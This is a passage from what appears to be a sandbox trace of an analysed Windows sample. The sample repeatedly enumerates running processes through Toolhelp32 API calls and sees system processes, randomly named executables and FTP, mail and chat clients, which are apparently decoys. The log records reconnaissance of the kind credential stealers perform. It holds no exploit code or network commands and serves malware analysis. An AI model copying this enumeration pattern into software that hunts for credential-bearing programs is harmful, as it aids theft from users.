cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.909] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0222.911] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0222.912] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0222.914] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.915] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0222.917] CloseHandle (hObject=0x1eb8) returned 1 [0222.917] Sleep (dwMilliseconds=0x64) [0222.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0222.965] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.966] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.968] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.970] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.006] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.007] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.009] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.011] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.012] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.014] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.015] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.017] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.018] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.020] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.022] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.028] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.030] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.032] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.033] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.035] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.037] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.038] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.040] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.042] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.044] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.046] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.120] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0223.121] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0223.124] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.125] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.127] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.129] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.130] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0223.132] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.133] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.135] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.137] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0223.138] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0223.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0223.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0223.143] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0223.145] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0223.146] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0223.148] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0223.149] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0223.151] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0223.157] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0223.198] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0223.200] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0223.201] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0223.202] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0223.271] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0223.274] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0223.276] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0223.278] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0223.281] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0223.283] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0223.286] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0223.288] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0223.291] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0223.293] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0223.295] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0223.297] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0223.299] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0223.346] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0223.348] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0223.350] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0223.352] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0223.354] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0223.356] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0223.358] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0223.361] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0223.363] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0223.365] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0223.369] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0223.371] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) 